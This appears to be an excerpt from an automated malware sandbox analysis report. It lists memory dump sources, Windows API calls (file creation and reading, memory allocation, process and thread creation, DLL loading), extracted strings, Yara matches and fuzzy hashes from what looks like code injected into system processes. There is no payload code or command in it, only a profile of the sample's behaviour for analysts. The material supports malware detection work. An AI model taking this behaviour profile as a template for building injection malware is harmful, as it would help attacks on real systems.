                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                          • Instruction ID: 807ae5e144d08af22ae12aa8f1ad19beb77c177cd9253d130fb62a99f8eed811
                                          • Opcode Fuzzy Hash: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                          • Instruction Fuzzy Hash: E7813A76D002699BDB31DF54CD54BEABBB8AF08710F0445EAE909B7280D7709E81CFA4

                                          Execution Graph

                                          Execution Coverage:3.1%
                                          Dynamic/Decrypted Code Coverage:3.9%
                                          Signature Coverage:1.4%
                                          Total number of Nodes:483
                                          Total number of Limit Nodes:74

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: %c$'$2$4$<$=b$>"$F;$FA$I$O^$T$[.?faV$aV$p$v${$~A$V
                                          • API String ID: 0-2672663033
                                          • Opcode ID: 3bec88986e45867c8ed0fbf7be268ecf60e98fa04da508ed000ba4ab32284af2
                                          • Instruction ID: 5afbd5e2c78d2f53169a4555c52a0f87726dcd396de222162d5fce1b2b12a7f0
                                          • Opcode Fuzzy Hash: 3bec88986e45867c8ed0fbf7be268ecf60e98fa04da508ed000ba4ab32284af2
                                          • Instruction Fuzzy Hash: BA02B2B0D05228CFEB24CF85C994BDDBBB2BB48308F10859AD2597B385C7B95A85CF54
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F8C124
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02F8C15F
                                          • FindClose.KERNELBASE(?), ref: 02F8C16A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: e66fe19e210c61c004ab4654cb6f47742337e29145d6c73c42df99821f641282
                                          • Instruction ID: 99ed7d7768e8f6558736e78a1a330bb269af45403518311a5767c46fbf096c6a
                                          • Opcode Fuzzy Hash: e66fe19e210c61c004ab4654cb6f47742337e29145d6c73c42df99821f641282
                                          • Instruction Fuzzy Hash: 3E3163B19006087BEB24EF64CC85FFFB77D9F54788F144459F648A7180DA70AA858FA0
                                          APIs
                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F98BEE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: c988eb6e20e4e7d4540f9f1dc262971096ab2b14d77f1157c3f8d026e8ad0ceb
                                          • Instruction ID: 1a5b8bc13649b2db26e2209a59bdf6260c940381e1d79cf04b678da359e1c245
                                          • Opcode Fuzzy Hash: c988eb6e20e4e7d4540f9f1dc262971096ab2b14d77f1157c3f8d026e8ad0ceb
                                          • Instruction Fuzzy Hash: 6F3192B5A01208AFDB14DF98D881EDEB7B9EF8C754F108259F919A7340D730A951CBA4
                                          APIs
                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F98D43
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 260bac6f070044ddbfd8828f63b822ef6ae4fd58c4aafcf7b6e926ca91c5abce
                                          • Instruction ID: 55f2799119eadfd7708a91db0e9833cd1be871a24defc25191ca66f3e2623ec9
                                          • Opcode Fuzzy Hash: 260bac6f070044ddbfd8828f63b822ef6ae4fd58c4aafcf7b6e926ca91c5abce
                                          • Instruction Fuzzy Hash: 1431A4B5A00208AFDB14DF98D881EDFB7B9AF8C754F108259F918A7240D670A9118FA5
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(02F817BE,?,02F97A0F,00000000,00000004,00003000,?,?,?,?,?,02F97A0F,02F817BE,02F817BE,00000000,?), ref: 02F99038
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: c507b712e608d353e1ec5d37df35059244e0ccfb2de01ab8de6d488befea3bf5
                                          • Instruction ID: e646505bfd17b6f2d50a513013faa7be05367bc9023255e31d8d48318821aa67
                                          • Opcode Fuzzy Hash: c507b712e608d353e1ec5d37df35059244e0ccfb2de01ab8de6d488befea3bf5
                                          • Instruction Fuzzy Hash: F121FBB5A01209AFDB14DF58DC81EEFB7B9EF88750F108259FA1897240D770A911CBA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: a4d55fc67187cefc39a7b8eaadb284caa1ee540d543c2fd8d06357a1f53b434b
                                          • Instruction ID: e743c6fbebe7f201babf9c0cdbb96551ca703568ac30f66b32a95245161d27aa
                                          • Opcode Fuzzy Hash: a4d55fc67187cefc39a7b8eaadb284caa1ee540d543c2fd8d06357a1f53b434b
                                          • Instruction Fuzzy Hash: 1C117071A012047FEA20EBA8CC41FEFB7ADDF85754F10855AFA0897280D67176158BE5
                                          APIs
                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F98E34
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                          • Associated: 0000000B.00000002.3145974902.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000B.00000002.3145974902.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_38c0000_sort.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                          • Associated: 0000000B.00000002.3145974902.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000B.00000002.3145974902.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_38c0000_sort.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                          • Associated: 0000000B.00000002.3145974902.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000B.00000002.3145974902.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_38c0000_sort.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 02F80857
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd$LDio
                                          • API String ID: 1836367815-2040179008

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 02F80857
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 02F80857
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 0-1269752229
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeUninitialize
                                          • String ID: @J7<
                                          • API String ID: 3442037557-2016760708
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 02F9359D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeUninitialize
                                          • String ID: @J7<
                                          • API String ID: 3442037557-2016760708
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F84002
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F87D6E,00000010,?,?,?,00000044,?,00000010,02F87D6E,?,?,?), ref: 02F99270
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F79AE5
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F79AE5
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,A0F52DE5,00000007,00000000,00000004,00000000,02F83816,000000F4), ref: 02F991BC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          APIs
                                          • RtlAllocateHeap.NTDLL(02F81469,?,02F95207,02F81469,02F950CF,02F95207,?,02F81469,02F950CF,00001000,?,?,00000000), ref: 02F9916F
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F87DDC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,02F81760,02F97A0F,02F950CF,02F81723), ref: 02F87BD3
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0